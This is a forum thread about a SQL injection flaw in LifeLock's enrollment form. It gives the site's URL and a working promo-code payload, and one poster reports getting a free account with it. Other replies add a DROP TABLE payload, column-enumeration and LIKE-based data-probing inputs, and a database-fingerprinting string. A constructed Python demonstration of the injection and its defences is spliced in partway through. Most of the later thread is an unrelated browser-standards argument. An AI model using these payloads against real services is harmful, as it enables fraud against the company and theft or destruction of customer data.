Lifelock



  • No, this isn't a post about Lifelock's CEO (the one who has advertisements with his SSN in them) having his identity stolen.

    Go to the LifeLock enrollment site: https://secure.lifelock.com/enrollmentform.aspx

    For the promotion code, use

    ' OR 1 = 1 OR '

    (with quotes).

    Hilarity ensues.



  • Wow, you mean I get a completely worthless product for FREE??

    Also, nice job with the link there. I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop. Jerk.



  • @Colin McGuigan said:

    Hilarity ensues.

    I wouldn't exactly call that "hilarity", but it is a WTF. The thing is, who's gonna go all the way with this and see if someone manually reviews it at the end?



  • @AbbydonKrafts said:

    I wouldn't exactly call that "hilarity", but it is a WTF. The thing is, who's gonna go all the way with this and see if someone manually reviews it at the end?

    I don't think that a manual review could spot this at all. The site seems to be selecting all existing discounts that match the promo code, then using the cheapest one. Adding the SQL snippet makes the SELECT statement return all rows in this table, of which the row with the smallest cost is then selected. This happens to be a complimentary account, which is obviously free.

    From that point forward the actual values from the database row are used, and any review will look like the appropriate code was entered.
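
As an added illustration of the mechanism Nandurius describes (this is constructed example code, not the thread's or LifeLock's own), the script below builds a small promotion table in SQLite with assumed columns, codes and prices, runs the lookup both by string concatenation and with a bound parameter, and includes the two server-side checks a defender would want: an allow-list on the entered code and a comparison of the entered code against the row actually applied, which is exactly what a later review would otherwise miss.

```python
import re
import sqlite3

# Constructed sample promotion table; schema, codes and prices are assumptions,
# not LifeLock's real data.
PROMOTIONS = [
    ("SAVE10", "You save $10.00!", 99.00),
    ("COMP", "Complimentary plan", 0.00),
    ("STANDARD", "Standard plan", 109.00),
]

# Assumed allow-list for promo codes: short alphanumeric tokens only.
CODE_PATTERN = re.compile(r"^[A-Za-z0-9-]{1,20}$")


def build_db():
    """Create an in-memory SQLite database holding the constructed table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Promotion (Code TEXT, Description TEXT, Cost REAL)")
    conn.executemany("INSERT INTO Promotion VALUES (?, ?, ?)", PROMOTIONS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, promo_code):
    """Build the query by string concatenation, as the enrollment form appears to.

    Entering  ' OR 1 = 1 OR '  turns the WHERE clause into
    Code = '' OR 1 = 1 OR '', which matches every row, so ORDER BY Cost
    hands back the cheapest promotion regardless of the code entered.
    """
    sql = ("SELECT Code, Description, Cost FROM Promotion WHERE Code = '"
           + promo_code + "' ORDER BY Cost ASC LIMIT 1")
    return conn.execute(sql).fetchone()


def lookup_parameterized(conn, promo_code):
    """Bind the code as a parameter: the quotes are plain data and no row matches."""
    sql = ("SELECT Code, Description, Cost FROM Promotion WHERE Code = ? "
           "ORDER BY Cost ASC LIMIT 1")
    return conn.execute(sql, (promo_code,)).fetchone()


def is_plausible_code(promo_code):
    """Allow-list check applied before any lookup (defence in depth)."""
    return CODE_PATTERN.match(promo_code) is not None


def code_mismatch(entered, row):
    """True when the row actually applied does not carry the code that was entered.

    The stored row looks legitimate after the fact, so the only place this can
    be caught is here, before the entered value is discarded.
    """
    return row is not None and row[0] != entered


if __name__ == "__main__":
    db = build_db()
    payload = "' OR 1 = 1 OR '"
    print("vulnerable   :", lookup_vulnerable(db, payload))
    print("parameterized:", lookup_parameterized(db, payload))
    print("plausible    :", is_plausible_code(payload))
    print("mismatch     :", code_mismatch(payload, lookup_vulnerable(db, payload)))
```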



  • How do they want to protect me if they can't protect themselves!?

    I also like the 'Hacker Safe' banner on the main page (bottom right) :D



  • @Nandurius said:

    From that point forward the actual values from the database row are used, and any review will look like the appropriate code was entered.

    The code isn't the problem as far as being the OR statement. I meant if they have some kind of review that would reveal that the applicant shouldn't have had access to the promotion at all. I'd imagine that a completely free account would probably even trigger a thorough manual review.



  • LOL!! It worked, I just signed up and got an e-mail from them:

    Dear XioPod,

    Thank you for enrolling with LifeLock®. You are the primary contact for the XioPod Family. You have elected the following payment option: Comp Plan, which includes a recurring payment of $ 0.00. This amount will be automatically charged to your credit card each month or year, depending on your payment option. Your Invoice Number is: [omitted]

    To contact us, please do not reply to this email. If you have any questions, please send a separate email to member.services@lifelock.com or give us a call at 1-877-543-3562 and select option 2. We are available 24/7.

    Thank you for your membership.

    Sincerely,
    LifeLock Member Services

    awesomeness



  • LOL, I can't believe you just tried that. wtg!

    Promo code: ' OR 1=1; DROP TABLE Customers --



  • @morbiuswilters said:

    Also, nice job with the link there.  I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.  Jerk. 

    In all fairness to the OP, I've had the same problem. I think there's some sort of WTF with this forum software. Sometimes when I put a link in a post it comes out fine and sometimes it doesn't, even though I don't do anything differently.



  • @El_Heffe said:

    Sometimes when I put a link in a post it comes out fine and sometimes it doesn't

    Lies! Plain-text editor does not fail.



  • @El_Heffe said:

    I think there's some sort of WTF with this forum software.

    Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.



  • @XioPod said:

    LOL!! it worked, i just signed up and got an e-mail from them:
    This amount will be automatically charged to your credit card each month or year, depending on your payment option.

     You didn't use your real card details did you? You really should bill free stuff to a test (Visa) card number like 4111 1111 1111 1111 ...



  • @MasterPlanSoftware said:

    @El_Heffe said:

    I think there's some sort of WTF with this forum software.

    Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.

    What, no Opera?



  • @bstorer said:

    What, no Opera?

    Nope, get a real browser.


  • Considered Harmful

    ' or [SomeColumnName] <> 1 or '

    Error if column doesn't exist, success if column does exist. If we figure out table names, we can union to select more data.

    [Name] is a valid column.



  • @MasterPlanSoftware said:

    @bstorer said:

    What, no Opera?

    Nope, get a real browser.


    ...

    @MasterPlanSoftware said:

    I have used IE7

    Wtf?


  • Considered Harmful

    ' OR Name like 'a%'-- or '

    Produces a comp account.

    ' OR Name like 'b%'-- or '

    Does not.



  • @joe.edwards said:

    ' or [SomeColumnName] <> 1 or '

    Error if column doesn't exist, success if column does exist. If we figure out table names, we can union to select more data.

    [Name] is a valid column.

    Kind of pointless though, can't see any way to get information out unless you can somehow insert a dynamic select and override the promotion description ("You save $10.00!") or whatever. Tricky without knowing the schema exactly.



  • @VisualD said:


    @MasterPlanSoftware said:

    I have used IE7

    Wtf?

    Do you not understand what I said? Do you not know what IE7 is?



  • Step 1 is to figure out what DB type it is... It could be Oracle ' OR GREATEST(1,2) = 1 OR ' works.



  • @MasterPlanSoftware said:


    Do you not understand what I said? Do you not know what IE7 is?

    Not a real browser? As in, actually far enough from the standards that it's not funny (yes I know it's better than 6, doesn't exactly say much). To claim Opera is not a real browser when you're implying IE7 is, is to me, somewhat laughable. As a web developer, Opera, FF and Safari display my valid XHTML / CSS / JavaScript almost identically, whereas IE (whatever, maybe not 8) is invariably well out of kilter. A "proper" browser to me would suggest one that actually follows international standards, like actually implementing that little known "CSS" thing properly, maybe even with a box model that actually makes sense.

    Thought it was pretty obvious really. I shall endeavor to be more verbose in future to aid in your comprehension.



  • @VisualD said:

    As a web developer

    Well there goes that credibility....

    If you think IE7 is the problem, then you don't understand the issue. Don't talk to me about standards.



  • @VisualD said:

    Not a real browser? As in, actually far enough from the standards that it's not funny (yes I know it's better than 6, doesn't exactly say much). To claim Opera is not a real browser when you're implying IE7 is, is to me, somewhat laughable. As a web developer, Opera, FF and Safari display my valid XHTML / CSS / JavaScript almost identically, whereas IE (whatever, maybe not 8) is invariably well out of kilter. A "proper" browser to me would suggest one that actually follows international standards, like actually implementing that little known "CSS" thing properly, maybe even with a box model that actually makes sense.

    Thought it was pretty obvious really. I shall endeavor to be more verbose in future to aid in your comprehension.

    If you are writing pages in XHTML you are almost certainly serving up broken HTML. Way to follow the standards there. Also, all of the browsers have flaws. IE has the largest install base so it is a de facto standard and if I had to choose only one browser to support, it would definitely be IE. People who endlessly appeal to "the standards" without realizing most standards are hopelessly flawed and no software follows them properly annoy the hell out of me. Seriously, get over it and write the goddamn code. This is what we are paid for. If it was so easy any idiot could do it then most of us wouldn't have jobs. Also, Opera sucks and needs to die. It's bad enough we have 3 mediocre browsers (IE, FF and Safari) but there is no reason for Opera to exist.



  • @morbiuswilters said:

    endlessly appeal to "the standards" without realizing most standards are hopelessly flawed

    And I am sure that VisualD can sit down and read through the standards and write a perfect working browser too...

    What these /. rejects need to realize is IE sets the standard. Whoever has the most market share? Standard. Plain and simple. Cry about it all you want, but that is the way it works.



  • @MasterPlanSoftware said:

    Whoever has the most market share? Standard.

    In that case, IE needs to support my <blink> tags, because Netscape Navigator used to be the standard!



  • @bstorer said:

    In that case, IE needs to support my <blink> tags, because Netscape Navigator used to be the standard!

    I have submitted that bug report to the IE team many times, they never answer me back.



  • @MasterPlanSoftware said:

    What these /. rejects need to realize is IE sets the standard. Whoever has the most market share? Standard. Plain and simple. Cry about it all you want, but that is the way it works.

    Thanks, I'll keep crying about it then. As loudly as I can manage.

    What you fail to understand is that standards give us a stable target for development. IE isn't a standard because it's not defined. We can observe IE's behavior, but Microsoft is free to change it at any given time, in any update. Real standards are written down, described thoroughly and unambiguously, and periodically reviewed and updated for improved clarity.

    I don't tolerate nebulous specifications at work. I certainly won't tolerate them from a company who gets touted as having "the most brilliant minds in the business."

    If your idea of a standard is "try to get it to work with IE," you don't know what a standard is. When I write HTML, I know it will look right on all the other browsers. They don't need 100% compliance for that, just good compliance. It's genuinely rare that ordinary HTML/CSS doesn't look right on them. I spend the bulk of my time creating content, and little to none of my time scrambling to get my work to look "acceptable" in an unpredictable environment. Maybe you don't consider your time as valuable as I consider mine.

    What this means to managers is: IE costs developers their time, and costs their employers money.



  • @MasterPlanSoftware said:

    What these /. rejects need to realize is IE sets the standard. Whoever has the most market share? Standard. Plain and simple.

    Except that IE doesn't seem to be pushing any new standard (at least not any more, and the IE vs Netscape non-standard tag race is well behind us). It's improving, but it still seems like the minimum effort is being put in by MS to prevent their less tech savvy users from immediately installing an alternate browser. Most of what's new in IE7 is just playing catch up with other browsers (e.g. tabs to compete with Firefox which was still years behind Opera. I wonder if the Opera devs get together with the Xerox PARC guys to moan about other people popularising their inventions).

    The W3C is still setting the standards because, well, no one's really actively pushing against them.

    @MasterPlanSoftware said:

    Cry about it all you want, but that is the way it works.

    Not all dissatisfaction with current situations is just "crying about it". Just because the majority are putting up with shit doesn't mean it's wrong to criticise it.

    @morbiuswilters said:

    endlessly appeal to "the standards" without realizing most standards are hopelessly flawed

    Everything has its flaws. Yes, you're spot on with the XHTML serving issue. The main issue with web standards though, seems to be the glacial pace of activity within the W3C. There are various talks about setting up alternate groups (I wish I could link to this, but it was a while ago that I was reading about it) to deal with this.

    Sometimes it'd be nice to have another full blown, standards decrying browser war, just to get things moving along. 



  • @drinkingbird said:

    The W3C is still setting the standards because, well, no one's really actively pushing against them.

    No, the W3C is still setting standards because that's all they do.



  • @morbiuswilters said:

    If you are writing pages in XHTML you are almost certainly serving up broken HTML. Way to follow the standards there. Also, all of the browsers have flaws. IE has the largest install base so it is a de facto standard and if I had to choose only one browser to support, it would definitely be IE. People who endlessly appeal to "the standards" without realizing most standards are hopelessly flawed and no software follows them properly annoy the hell out of me. Seriously, get over it and write the goddamn code. This is what we are paid for. If it was so easy any idiot could do it then most of us wouldn't have jobs. Also, Opera sucks and needs to die. It's bad enough we have 3 mediocre browsers (IE, FF and Safari) but there is no reason for Opera to exist.

    Well, given that I'm serving XHTML, yes it's true, it wouldn't be valid HTML... and how is following the XHTML standard not following "the standards"? It's just a different standard. One that works fine (for me, YMMV) in all the browsers listed; it's CSS that's broken in IE. In my experience, CSS is also to blame for most of the minor problems with the other browsers.

    Yes I know I have to write the hacks, but it's a far stretch to say that removing them would cause us to lose jobs, quite the opposite, it would allow us to focus more on our actual job, delivering good software. As Vgr said: "If your idea of a standard is "try to get it to work with IE," you don't know what a standard is." Undocumented proprietary code does not count as a standard. I have the same issue with OOXML.

    As far as the strange vitriol directed at Opera itself, what does it matter if, when I code for the 2nd most popular browser, it also magically works almost identically in Opera and Safari and in fact any mostly standards compliant browser*. Why shouldn't there be a choice? Are you anti-choice? Does it personally cause you problems? Do you have to invest any time in it?

    *(functionally if it supports or at least vaguely understands xhtml, visually if it supports at least css2 properly, and extra-functionality with javascript / css3.)

    @MasterPlanSoftware said:

    And I am sure that VisualD can sit down and read through the standards and write a perfect working browser too...

    Ridiculous argument, of course not, certainly not on my own in a reasonable time. Nor did I claim or imply that I could. Clearly no-one is going to be creating the perfect browser anytime soon. But Firefox and the rest make a decent stab at it. IE is good in many ways, but very weak in important ones, and this is from a company that clearly has the resources to do this at least as well as the others. So why drag their feet? It's all about control.



  • @mxsscott said:

    @XioPod said:

    LOL!! it worked, i just signed up and got an e-mail from them:
    This amount will be automatically charged to your credit card each month or year, depending on your payment option.

    You didn't use your real card details did you? You really should bill free stuff to a test (Visa) card number like 4111 1111 1111 1111 ...

    It didn't require any! Notice when you switch to the comp coupon code the billing info box isn't shown. The real WTF is if you simply click submit on a blank app... all the flashing X's almost gave me a seizure.



  • VisualD: If you're serving XHTML, IE is a non-issue as IE does not support the XHTML mime-type. If your page works in IE, you're serving XHTML as HTML, which is indeed broken HTML as morbiuswilters said.



  • @XioPod said:

    LOL!! it worked, i just signed up and got an e-mail from them:

    awesomeness

    I think using SQL injection to rip off a company to whom you're providing all of your personally identifying information is a minor WTF by itself.

    -MBirchmeier



  • @MasterPlanSoftware said:

    @El_Heffe said:

    I think there's some sort of WTF with this forum software.

    Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.

    O RLY?



  • @mshade said:

    O RLY?

    Perhaps you should lurk a little more before acting like a little retard.

    There was no problem linking, because I don't stick links all over threads when I don't expect them to be followed. When you put a link into a post and it doesn't work, it is YOUR fault, not the forum software. Especially in an OP.

    Copying and pasting a url into a post is different than complaining "OMGz I can't make links work! Forum software sucks!"



  • Serving valid XHTML as text/html picks up on the doctype and renders in standards compliance mode in FF 2.0.0.14, Safari 3.1.1 (Win), Opera 9.27, IE7, and IE8b1. IE6 renders in quirks mode. IE6 requires CSS and javascript tricks to render properly, IE7 requires fewer CSS tricks and no js tricks to render properly, and IE8b1 requires no tricks (for the web site I'm developing anyway). I had considered switching everything to HTML 4.01, but when I saw it rendering in standards compliance mode on everything except IE6, I decided to leave it as-is.



  • I'm just sick of the rendering bugs in IE. Hacks upon hacks to make it work. And then the hacks start back-firing...

    For example, I had some CSS which had display:relative in the body tag to fix another rendering bug. Problem was putting this CSS into an iframe would cause the iframe to disappear in IE sometimes. Resizing the window would bring it back until you moused over a certain area. This bug took two days to figure out! So this meant separate CSS files for different pages. Luckily most of these weirdnesses could go into the conditional comments for IE so that normal browsers would only get the one CSS file.

    @Sir Twist said:

    IE7 requires fewer CSS tricks and no js tricks to render properly,

    IE7 still doesn't support PNG completely. :-( My cool icons are being converted back to GIF so they look half-way decent although the PNG versions are sweet in the non-IE browsers I test in.



  • @Zemm said:

    I'm just sick of the rendering bugs in IE.

    Haven't you heard MPS? What IE does is standard, make it fitting for IE and screw all the minor browsers. Why not use non-accessible table-based layout? It worked well in the past. Let's not look ahead! Let's reintroduce old features! marquee & blink tags, shiny blinking animated gifs, pink font on purple background, but with a repeated self-portrait behind the text (as a gif of course, because it is small and you still can see the purple background through its transparent color). position:fixeds can perfectly be emulated with frames, position:absolutes with another table around the existing layout, and so on. Screw the whole standards bullshit. IE ftw.

    Okay, now that we have that out of the way, we can finally return to topic, or can't we? I'm interested in whether XioPod's account is running well or whether joe.edwards already succeeded in dumping the customer table.



  • @Zemm said:

    IE7 still doesn't support PNG completely.

    I was pretty sure it did. What part is still missing?



  • @derula said:

    marquee & blink tags, shiny blinking animated gifs, pink font on purple background, but with a repeated self-portrait behind the text (as a gif of course, because it is small and you still can see the purple background through its transparent color). position:fixeds can perfectly be emulated with frames, position:absolutes with another table around the existing layout, and so on.

    Dude, it's already been done.



  • @Sir Twist said:

    Serving valid XHTML as text/html picks up on the doctype and renders in standards compliance mode in FF 2.0.0.14, Safari 3.1.1 (Win), Opera 9.27, IE7, and IE8b1. IE6 renders in quirks mode. IE6 requires CSS and javascript tricks to render properly, IE7 requires fewer CSS tricks and no js tricks to render properly, and IE8b1 requires no tricks (for the web site I'm developing anyway). I had considered switching everything to HTML 4.01, but when I saw it rendering in standards compliance mode on everything except IE6, I decided to leave it as-is.

    Wrong.  They render in standards-compliance mode as HTML not XHTML, so you are actually serving up broken HTML if you send XHTML as text/html.



  • @derula said:

    Haven't you heard MPS? What IE does is standard, make it fitting for IE and screw all the minor browsers. Why not use non-accessible table-based layout? It worked well in the past. Let's not look ahead! Let's reintroduce old features! marquee & blink tags, shiny blinking animated gifs, pink font on purple background, but with a repeated self-portrait behind the text (as a gif of course, because it is small and you still can see the purple background through its transparent color). position:fixeds can perfectly be emulated with frames, position:absolutes with another table around the existing layout, and so on. Screw the whole standards bullshit. IE ftw.

    You miss the point completely and that is sad. The standards are just guidelines and like any standard are not followed 100% by every user agent. IE is close enough to the standard that it doesn't require a whole lot of workarounds to get content to render fine. And honestly since IE is 90% or more of the market I don't mind doing a little extra work to reach those users. The standards aren't there so you can just write "standards-compliant" code and never have to test it. Anyone who has done non-trivial web apps will have to create workarounds for FF, Safari and Opera as well, although not to the degree that one does for IE. Still, Opera is something like 0.5% of the market, so I'm not that interested in spending time making sure everything renders correctly. As far as the web goes, we actually have 4 relatively equal browsers. Compared to the pain of SMTP and IMAP clients and servers as well as C (or C++ *shudder*) compilers, all four browsers are fairly interoperable.



  • @elgate said:

    Dude, it's already been done.

    Hey, they do have a pretty great flash media player, with spectrum analyzer and playlist and playback time. ... well, forget about the spectrum analyzer, but the playback time even has ten second precision! I've seen that nowhere else yet.

    @morbiuswilters said:

    [lengthy text]

    Yeah. I just wonder: why can't the 90% market share browser do what others are already doing? But I wonder many things. E.g., why don't certain major German press agencies have any feeling for journalistic responsibility? ... Maybe I just ask too many questions. Still a child on the inside (at least).



  • @derula said:

    Yeah. I just wonder: why can't the 90% market share browser do what others are already doing? But I wonder many things. E.g., why don't certain major German press agencies have any feeling for journalistic responsibility? ... Maybe I just ask too many questions.

    Probably because the actual differences between IE and FF are so minor. Sure, we all know the numerous IE rendering or JS bugs, but really 99% of the time stuff works right. Also, remember that MS can't just push out an update that patches every bug without severely affecting users. There are a lot of pages written for IE or with IE-specific hacks that would break if it started rendering correctly. Things like this have to go through many months of testing and deployment planning by 3rd parties. Quite frankly, it doesn't bother me too much because at the end of the day I just spend a little extra time making my pages look right in IE. It also limits the complexity of interfaces that can be developed in web apps which is a great thing because we do not need complex UIs built out of HTML and JS. Hopefully IE's incompatibilities will continue until all complex UI work is done in Flash/Silverlight.

    @derula said:

    Still a child on the inside (at least).

    Your brother isn't the only one who should be watching his ass around MPS.



  • @morbiuswilters said:

    @derula said:
    Still a child on the inside (at least).
    Your brother isn't the only one who should be watching his ass around MPS.

    I'm not concerned. I'm sure my tight Lederhosen will scare him off. If not, I still have an undetonated bomb from WWII in my basement which I just happened to build a new detonator for. If that still doesn't help, I have some toxic gas here and have it ready and attached to my shower.



  • @derula said:

    If that still doesn't help, I have some toxic gas here and have it ready and attached to my shower.

    You are way more fun and cool than ammoQQ.



  • @morbiuswilters said:

    You are way more fun and cool than ammoQQ.

    ammoQ actually reminds me of a great quote from german-bash.org:

    @Rough translation said:

    <Sodaya> give me rights in the channel

    <shin> nope

    <Sodaya> why?

    <shin> because you're austrian

    <shin> the last austrian we gave op led us into total warfare



  • @derula said:

    ammoQ actually reminds me of a great quote from german-bash.org:
    ...
    <shin> because you're austrian
    <shin> the last austrian we gave op led us into total warfare

    *lol*

    Seems like Alex hasn't learned from history, neither have the Californians.



  • @morbiuswilters said:

    I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.

    Ever heard of the 'referrer'? If so, you might see why one wouldn't want it showing up when directing others to hack a website.



  • @m0ffx said:

    Ever heard of the 'referrer'?

    No, not in this context. But I'm sure someone might occasionally check the referer to see where the hits are coming from.

